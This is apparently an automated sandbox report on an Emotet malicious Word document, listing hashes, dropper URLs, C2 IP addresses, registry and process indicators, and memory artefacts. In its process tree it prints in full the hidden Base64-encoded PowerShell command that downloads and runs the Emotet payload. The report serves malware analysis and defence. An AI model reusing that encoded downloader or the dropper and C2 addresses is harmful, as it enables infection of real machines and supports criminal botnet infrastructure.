emotet | 8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4

General

Target

8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4.doc
Size

209KB
MD5

74f56116f882efc1b2d432e362c84654
SHA1

10a00bdb8a61421f4868232ad6ea987121bd91bb
SHA256

8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4
SHA512

70f588d809b203b1f19f88cbf927d820b37b6bdd3358c47cfe5d7812695780f8a808d4b51fa7b90a8e88b2d25f1d11bd9620b9e696e1a39757202d5b171f8e2d

Score

10^/10

emotet epoch1 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://inbichngoc.com/wp-admin/K/

exe.dropper

http://www.angiathinh.com/autotoxication/96F/

exe.dropper

http://www.meshzs.com/wp-includes/p6/

exe.dropper

https://dartzeel.com/wp-content/jHy/

exe.dropper

https://zhidong.store/wp-content/BDY/

exe.dropper

https://australaqua.com/wp-content/xIt/

exe.dropper

https://nurmarkaz.org/designl/u/

Extracted

Family

emotet

Botnet

Epoch1

C2

190.202.229.74:80

118.69.11.81:7080

70.39.251.94:8080

87.230.25.43:8080

94.23.62.116:8080

37.187.161.206:8080

45.46.37.97:80

138.97.60.141:7080

177.144.130.105:8080

169.1.39.242:80

209.236.123.42:8080

202.134.4.210:7080

193.251.77.110:80

2.45.176.233:80

217.13.106.14:8080

189.223.16.99:80

190.101.156.139:80

77.238.212.227:80

181.58.181.9:80

37.183.81.217:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 740 3288 POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	3288	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/3792-12-0x0000000002EB0000-0x0000000002EE4000-memory.dmp	emotet
behavioral1/memory/3792-13-0x0000000002EF0000-0x0000000002F23000-memory.dmp	emotet
behavioral1/memory/2760-16-0x0000000002880000-0x00000000028B4000-memory.dmp	emotet
behavioral1/memory/2760-17-0x00000000028C0000-0x00000000028F3000-memory.dmp	emotet

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

15 740 POwersheLL.exe
17 740 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

Lu7c99t.exeDsui.exe

pid process

3792 Lu7c99t.exe
2760 Dsui.exe
Drops file in System32 directory 1 IoCs

Processes:

Lu7c99t.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe Lu7c99t.exe

flow	pid	process
15	740	POwersheLL.exe
17	740	POwersheLL.exe

pid	process
3792	Lu7c99t.exe
2760	Dsui.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe	Lu7c99t.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

744 WINWORD.EXE
744 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

POwersheLL.exeDsui.exe

pid process

740 POwersheLL.exe
740 POwersheLL.exe
740 POwersheLL.exe
2760 Dsui.exe
2760 Dsui.exe
2760 Dsui.exe
2760 Dsui.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 740 POwersheLL.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

744 WINWORD.EXE
744 WINWORD.EXE
744 WINWORD.EXE
744 WINWORD.EXE
744 WINWORD.EXE
744 WINWORD.EXE
744 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
744	WINWORD.EXE
744	WINWORD.EXE

pid	process
740	POwersheLL.exe
740	POwersheLL.exe
740	POwersheLL.exe
2760	Dsui.exe
2760	Dsui.exe
2760	Dsui.exe
2760	Dsui.exe

description	pid	process
Token: SeDebugPrivilege	740	POwersheLL.exe

pid	process
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE
744	WINWORD.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Lu7c99t.exe

description	pid	process	target process
PID 3792 wrote to memory of 2760	3792	Lu7c99t.exe	Dsui.exe
PID 3792 wrote to memory of 2760	3792	Lu7c99t.exe	Dsui.exe
PID 3792 wrote to memory of 2760	3792	Lu7c99t.exe	Dsui.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -windowstyle hidden -ENCOD IAAkAG8AaABGAD0AWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMAB9AHsANAB9AHsAMgB9AHsAMwB9ACIAIAAtAEYAJwBzACcALAAnAFMAWQAnACwAJwBlAE0ALgBpAE8ALgBEAEkAcgBlAEMAVABPACcALAAnAFIAWQAnACwAJwB0ACcAKQAgACAAOwAgACAAUwBlAFQALQBWAEEAcgBpAGEAQgBsAGUAIAAyADQAOQBOAGoAIAAoAFsAVABZAFAAZQBdACgAIgB7ADUAfQB7ADMAfQB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwBOAGEARwBFAHIAJwAsACcALgBTAEUAcgBWACcALAAnAGkATgB0AE0AQQAnACwAJwBlAHQAJwAsACcAaQBjAGUAcABvACcALAAnAHMAWQBzAFQARQBNAC4ATgAnACkAIAAgACkAOwAgACQARwBlAHQAagA5ADMAaAA9ACgAKAAnAFIAdgAyACcAKwAnADkAdgAnACkAKwAnAHUAMQAnACkAOwAkAEMAdQA5ADQAdgAxADEAPQAkAFIAYgA2AGIAZwBxADcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQAZABrAGcAdwA5AGYAOwAkAEUANwB1AHEAaAByAHoAPQAoACcAQgB6ACcAKwAoACcAaQBhACcAKwAnAHQAcgB5ACcAKQApADsAIAAgACQATwBIAGYAOgA6ACIAQwByAEUAYQB0AGUAYABkAGAAaQByAGAARQBgAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAE0AJwArACgAJwBLAHgAJwArACcARABqACcAKQArACcAbAA4ACcAKwAnAHcAawAnACsAJwBvACcAKwAoACcATQBLAHgASQBhACcAKwAnADIAJwArACcAegBqAGkAJwApACsAJwBuAE0AJwArACcASwB4ACcAKQAuACIAUgBlAFAAYABMAGAAQQBDAGUAIgAoACgAWwBDAGgAQQByAF0ANwA3ACsAWwBDAGgAQQByAF0ANwA1ACsAWwBDAGgAQQByAF0AMQAyADAAKQAsAFsAcwBUAFIAaQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEkAdABhAGkAbgBtADgAPQAoACcARwAnACsAJwB3ACcAKwAoACcAdAA1ACcAKwAnAHIAYQBhACcAKQApADsAIAAgACgAIABWAGEAUgBJAEEAYgBsAGUAIAAyADQAOQBOAGoAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBDAGAAVQBgAFIASQBUAHkAUAByAGAATwBUAE8AYwBPAGwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEwANgAyADEAYQBqAGEAPQAoACgAJwBJAHIAJwArACcAXwByACcAKQArACgAJwBpADYAJwArACcAbwAnACkAKQA7ACQAWQBvAHkAXwBrAHIAbgAgAD0AIAAoACcATAAnACsAKAAnAHUANwBjACcAKwAnADkAOQB0ACcAKQApADsAJABaADEAaAB2ADAANwA3AD0AKAAnAFIAcwAnACsAKAAnAHYAJwArACcAegAxADAAMgAnACkAKQA7ACQATgA0ADgANwBuAHAAdgA9ACgAKAAnAEYAJwArACcAagBvADkAJwApACsAKAAnAGYAMAAnACsAJwA1ACcAKQApADsAJABaAGwAYQA1AHIAdABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBoAGcAWgAnACsAJwBEACcAKQArACcAagAnACsAKAAnAGwAJwArACcAOAB3ACcAKQArACgAJwBrAG8AJwArACcAaAAnACkAKwAoACcAZwBaAEkAJwArACcAYQAnACkAKwAoACcAMgAnACsAJwB6AGoAaQBuACcAKwAnAGgAZwBaACcAKQApAC4AIgBSAGUAYABQAGwAQQBjAEUAIgAoACgAWwBjAEgAYQBSAF0AMQAwADQAKwBbAGMASABhAFIAXQAxADAAMwArAFsAYwBIAGEAUgBdADkAMAApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADkAMgApACkAKwAkAFkAbwB5AF8AawByAG4AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEkAOQAxAGsAYwBwAGoAPQAoACgAJwBQACcAKwAnADkANAAnACkAKwAnADIAawAnACsAJwB6AHUAJwApADsAJABYAHQAeQBsAGkAdwBkAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAHcAZQBiAEMATABJAEUATgB0ADsAJABUAHoAbAB6AGMAOQBoAD0AKAAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AF0AWwAnACsAJwAoAHMAKQBdAHcAJwApACsAJwBdACcAKwAnAFsAJwArACgAJwAoAHMAKQAnACsAJwBdAHcAaQBuACcAKwAnAGIAaQBjACcAKwAnAGgAJwApACsAJwBuACcAKwAoACcAZwBvACcAKwAnAGMAJwApACsAKAAnAC4AJwArACcAYwBvAG0AXQAnACkAKwAoACgAJwBbACcAKwAnACgAcwAnACkAKQArACgAKAAnACkAJwArACcAXQB3AHcAcAAtACcAKwAnAGEAJwApACkAKwAoACcAZABtACcAKwAnAGkAbgAnACkAKwAoACcAXQBbACgAcwApAF0AJwArACcAdwAnACsAJwBLAF0AJwApACsAKAAoACcAWwAoACcAKQApACsAKAAoACcAcwApACcAKQApACsAJwBdACcAKwAoACcAdwAnACsAJwBAAGgAJwApACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAF0AJwArACcAWwAoAHMAKQAnACkAKwAnAF0AJwArACgAKAAnAHcAXQAnACsAJwBbACgAJwApACkAKwAnAHMAJwArACcAKQAnACsAJwBdACcAKwAnAHcAJwArACgAJwB3AHcAJwArACcAdwAnACkAKwAnAC4AJwArACcAYQAnACsAKAAnAG4AZwBpACcAKwAnAGEAdAAnACkAKwAnAGgAJwArACgAJwBpAG4AaAAnACsAJwAuAGMAbwBtAF0AWwAnACsAJwAoAHMAKQAnACkAKwAoACcAXQB3AGEAJwArACcAdQB0AG8AdABvAHgAaQAnACsAJwBjACcAKQArACcAYQB0ACcAKwAnAGkAJwArACgAJwBvAG4AJwArACcAXQAnACkAKwAoACgAJwBbACgAJwArACcAcwAnACkAKQArACgAKAAnACkAXQAnACsAJwB3ACcAKQApACsAJwA5ACcAKwAoACcANgBGACcAKwAnAF0AJwApACsAKAAnAFsAKABzACkAXQB3ACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACcAXQAnACsAKAAnAFsAJwArACcAKABzACkAXQAnACkAKwAnAHcAJwArACcAXQBbACcAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwB3AHcAJwApACkAKwAoACcAdwAnACsAJwAuAG0AZQAnACkAKwAoACcAcwAnACsAJwBoAHoAcwAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAF0AWwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwB3AHAALQBpAG4AYwAnACsAJwBsAHUAZAAnACsAJwBlAHMAJwApACkAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAcAAnACkAKwAnADYAJwArACgAKAAnAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApACcAKQApACsAJwBdAHcAJwArACgAJwBAAGgAJwArACcAdAB0AHAAcwAnACkAKwAnADoAXQAnACsAKAAoACcAWwAoACcAKQApACsAJwBzACcAKwAoACgAJwApAF0AJwApACkAKwAoACcAdwAnACsAJwBdAFsAKABzACkAJwArACcAXQAnACkAKwAoACcAdwBkACcAKwAnAGEAJwApACsAJwByACcAKwAoACcAdAB6ACcAKwAnAGUAZQBsACcAKQArACcALgAnACsAJwBjACcAKwAoACgAJwBvAG0AXQAnACsAJwBbACgAJwApACkAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQB3AHcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACsAJwB0AF0AJwArACcAWwAoAHMAKQAnACkAKwAoACcAXQB3AGoAJwArACcASAAnACkAKwAoACgAJwB5AF0AJwArACcAWwAoACcAKQApACsAJwBzACcAKwAnACkAJwArACcAXQB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAJwApACsAJwA6ACcAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAoACcAegAnACsAJwBoAGkAZAAnACkAKwAoACcAbwAnACsAJwBuAGcALgBzACcAKQArACgAJwB0AG8AcgAnACsAJwBlAF0AWwAoAHMAJwArACcAKQBdACcAKwAnAHcAJwApACsAJwB3AHAAJwArACgAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwApACsAKAAnAF0AJwArACcAWwAoAHMAKQAnACsAJwBdACcAKQArACgAJwB3ACcAKwAnAEIARABZAF0AWwAnACkAKwAnACgAJwArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACcAcABzACcAKwAoACgAJwA6AF0AWwAnACsAJwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwBdAFsAKAAnACsAJwBzACkAXQAnACkAKQArACcAdwBhACcAKwAnAHUAJwArACcAcwAnACsAKAAnAHQAcgAnACsAJwBhAGwAJwApACsAKAAoACcAYQBxAHUAYQAuACcAKwAnAGMAbwAnACsAJwBtAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApAF0AdwAnACsAJwB3AHAAJwArACcALQBjAG8AJwApACkAKwAoACcAbgB0AGUAbgB0ACcAKwAnAF0AJwApACsAJwBbACcAKwAoACcAKABzACcAKwAnACkAXQB3AHgASQB0AF0AWwAoAHMAKQBdAHcAQABoACcAKwAnAHQAdAAnACsAJwBwAHMAOgBdACcAKwAnAFsAJwApACsAKAAnACgAJwArACcAcwApAF0AdwBdACcAKQArACgAJwBbACcAKwAnACgAcwApAF0AJwApACsAJwB3AG4AJwArACcAdQByACcAKwAoACcAbQBhACcAKwAnAHIAJwApACsAKAAnAGsAYQB6AC4AJwArACcAbwAnACkAKwAoACcAcgAnACsAJwBnAF0AJwApACsAJwBbACcAKwAnACgAJwArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAnAGQAZQAnACsAJwBzACcAKwAnAGkAJwArACgAJwBnACcAKwAnAG4AbABdACcAKQArACgAJwBbACcAKwAnACgAcwApACcAKQArACcAXQAnACsAKAAnAHcAdQBdACcAKwAnAFsAJwApACsAJwAoACcAKwAoACgAJwBzACkAJwApACkAKwAnAF0AdwAnACkALgAiAFIAYABlAGAAUABMAGEAQwBFACIAKAAoACgAKAAnAF0AWwAnACsAJwAoAHMAJwApACkAKwAoACgAJwApAF0AJwArACcAdwAnACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4AHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABVADUAdABlAGIAeAByACAAKwAgACQAQwB1ADkANAB2ADEAMQAgACsAIAAkAEQANABuAHoAcgA5ADgAKQA7ACQAUgBjAG4ANABpAHEAXwA9ACgAKAAnAE8AcQAnACsAJwBrACcAKQArACgAJwBwAHcANgAnACsAJwBlACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABPAHcAdgAxAG8AagBvACAAaQBuACAAJABUAHoAbAB6AGMAOQBoACkAewB0AHIAeQB7ACQAWAB0AHkAbABpAHcAZAAuACIARABgAG8AdwBOAEwATwBgAEEARABGAGkAYABMAGUAIgAoACQATwB3AHYAMQBvAGoAbwAsACAAJABaAGwAYQA1AHIAdABuACkAOwAkAFIAOABmAGwAcAAxAHIAPQAoACgAJwBMAGcAZgAnACsAJwBqACcAKQArACgAJwBiACcAKwAnAHYAXwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABaAGwAYQA1AHIAdABuACkALgAiAEwARQBOAGAARwB0AEgAIgAgAC0AZwBlACAANAAzADAANwA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAzADIAJwArACcAXwBQAHIAJwArACcAbwBjAGUAJwApACsAJwBzACcAKwAnAHMAJwApACkALgAiAGMAYABSAEUAYQB0AEUAIgAoACQAWgBsAGEANQByAHQAbgApADsAJABDAGMAaQBtADMAawBtAD0AKAAnAEwAJwArACgAJwB2AHYAJwArACcAbQBjACcAKQArACcAMABrACcAKQA7AGIAcgBlAGEAawA7ACQAVgBhAHYANAB2AGsAMAA9ACgAJwBSAG4AJwArACcAYgAnACsAKAAnAGwAMQAnACsAJwBiAF8AJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbgB0ADQAOABoADkAPQAoACgAJwBVAHMAJwArACcAXwAnACkAKwAoACcAZgA3ACcAKwAnAG4AbgAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exe
C:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe
"C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2760

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
1⤵
PID:1236

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
1⤵
PID:204

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
1⤵
- Modifies data under HKEY_USERS
PID:3940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exe

MD5
8846e4b6fa9202bf962b3a7da791e970

SHA1
9219f32bec1ca332068065d622dfd50e51536677

SHA256
9d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632

SHA512
bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf

Download Submit
C:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exe

MD5
8846e4b6fa9202bf962b3a7da791e970

SHA1
9219f32bec1ca332068065d622dfd50e51536677

SHA256
9d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632

SHA512
bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf

Download Submit
C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe

MD5
8846e4b6fa9202bf962b3a7da791e970

SHA1
9219f32bec1ca332068065d622dfd50e51536677

SHA256
9d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632

SHA512
bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf

Download Submit
memory/740-7-0x00007FFF60FB0000-0x00007FFF6199C000-memory.dmp

Filesize
9.9MB

Download
memory/740-8-0x000001BAD0BC0000-0x000001BAD0BC1000-memory.dmp

Filesize
4KB

Download
memory/740-9-0x000001BAD0DD0000-0x000001BAD0DD1000-memory.dmp

Filesize
4KB

Download
memory/744-0-0x00007FFF68A90000-0x00007FFF690C7000-memory.dmp

Filesize
6.2MB

Download
memory/2760-14-0x0000000000000000-mapping.dmp

Download
memory/2760-16-0x0000000002880000-0x00000000028B4000-memory.dmp

Filesize
208KB

Download
memory/2760-17-0x00000000028C0000-0x00000000028F3000-memory.dmp

Filesize
204KB

Download
memory/3792-12-0x0000000002EB0000-0x0000000002EE4000-memory.dmp

Filesize
208KB

Download
memory/3792-13-0x0000000002EF0000-0x0000000002F23000-memory.dmp

Filesize
204KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads